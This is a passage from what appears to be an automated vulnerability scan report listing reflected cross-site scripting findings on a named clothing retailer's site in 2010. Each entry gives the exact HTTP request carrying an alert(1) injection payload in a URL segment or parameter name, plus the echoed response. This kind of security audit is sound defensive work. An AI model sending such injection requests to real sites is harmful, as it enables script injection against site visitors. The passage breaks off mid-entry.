1.254. http://www.fredperry.com/women/amy-winehouse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9291"-alert(1)-"93024d59deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse/?d9291"-alert(1)-"93024d59deb=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gufs30tkuq7tsvkseov3hags26; expires=Tue, 09-Nov-2010 17:09:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse/?d9291"-alert(1)-"93024d59deb=1");
//]]>
...[SNIP]...

1.255. http://www.fredperry.com/women/dresses/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25282"-alert(1)-"158d6988500 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women25282"-alert(1)-"158d6988500/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jfe33a0hqu3ps2h8sq0i0aat74; expires=Tue, 09-Nov-2010 17:07:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women25282"-alert(1)-"158d6988500/dresses/");
//]]>
...[SNIP]...

1.256. http://www.fredperry.com/women/dresses/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb509"-alert(1)-"f266c581b8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/dressescb509"-alert(1)-"f266c581b8c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f086sn2pv4tc4qtl4v9125gp50; expires=Tue, 09-Nov-2010 17:07:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/dressescb509"-alert(1)-"f266c581b8c/");
//]]>
...[SNIP]...

1.257. http://www.fredperry.com/women/dresses/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e413f"-alert(1)-"b0fd3b1a901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/dresses/?e413f"-alert(1)-"b0fd3b1a901=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=221l38upcp25ht23t6dhihv926; expires=Tue, 09-Nov-2010 17:05:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/dresses/?e413f"-alert(1)-"b0fd3b1a901=1");
//]]>
...[SNIP]...

1.258. http://www.fredperry.com/women/jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceb63"-alert(1)-"988eea48a0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenceb63"-alert(1)-"988eea48a0f/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r2u0bkdmhpeoie140jqga16s62; expires=Tue, 09-Nov-2010 17:06:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenceb63"-alert(1)-"988eea48a0f/jackets/");
//]]>
...[SNIP]...

1.259. http://www.fredperry.com/women/jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43191"-alert(1)-"f4d25c2ca9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/jackets43191"-alert(1)-"f4d25c2ca9e/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ao426si1mmbbjr0edk92t0aes3; expires=Tue, 09-Nov-2010 17:07:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/jackets43191"-alert(1)-"f4d25c2ca9e/");
//]]>
...[SNIP]...

1.260. http://www.fredperry.com/women/jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a4b8"-alert(1)-"3bbedec9e5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/jackets/?2a4b8"-alert(1)-"3bbedec9e5f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pfcri497r2ueetea7urcohu747; expires=Tue, 09-Nov-2010 17:05:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/jackets/?2a4b8"-alert(1)-"3bbedec9e5f=1");
//]]>
...[SNIP]...

1.261. http://www.fredperry.com/women/knitwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11b29"-alert(1)-"273e9eef3e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women11b29"-alert(1)-"273e9eef3e5/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4o7qubhm2bo1i8btr5tc4oect0; expires=Tue, 09-Nov-2010 17:05:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women11b29"-alert(1)-"273e9eef3e5/knitwear/");
//]]>
...[SNIP]...

1.262. http://www.fredperry.com/women/knitwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61f7"-alert(1)-"884c352a4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/knitweare61f7"-alert(1)-"884c352a4e4/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mi0e2ngejjg98skppdnt2esdr6; expires=Tue, 09-Nov-2010 17:06:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/knitweare61f7"-alert(1)-"884c352a4e4/");
//]]>
...[SNIP]...

1.263. http://www.fredperry.com/women/knitwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44619"-alert(1)-"dbe8083a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/knitwear/?44619"-alert(1)-"dbe8083a92f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jg2bea0k5a1bi85j6cfjfu1t93; expires=Tue, 09-Nov-2010 17:04:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/knitwear/?44619"-alert(1)-"dbe8083a92f=1");
//]]>
...[SNIP]...

1.264. http://www.fredperry.com/women/shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c1d6"-alert(1)-"97d7c111880 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women4c1d6"-alert(1)-"97d7c111880/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ri1i2t61fio44aap2f55471d51; expires=Tue, 09-Nov-2010 17:06:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women4c1d6"-alert(1)-"97d7c111880/shirts/");
//]]>
...[SNIP]...

1.265. http://www.fredperry.com/women/shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef5c3"-alert(1)-"8cfe24c93e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/shirtsef5c3"-alert(1)-"8cfe24c93e6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j2ij7luab3bn191k5buu7ph790; expires=Tue, 09-Nov-2010 17:06:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/shirtsef5c3"-alert(1)-"8cfe24c93e6/");
//]]>
...[SNIP]...

1.266. http://www.fredperry.com/women/shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2d16"-alert(1)-"a05c72fdefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/shirts/?e2d16"-alert(1)-"a05c72fdefc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0g3pt5mes9t1hnr5s0vl9v3pk6; expires=Tue, 09-Nov-2010 17:04:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/shirts/?e2d16"-alert(1)-"a05c72fdefc=1");
//]]>
...[SNIP]...

1.267. http://www.fredperry.com/women/skirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ad15"-alert(1)-"728545c861 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women2ad15"-alert(1)-"728545c861/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2do6j1q2fvqoha0sk554ck7jb6; expires=Tue, 09-Nov-2010 17:09:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
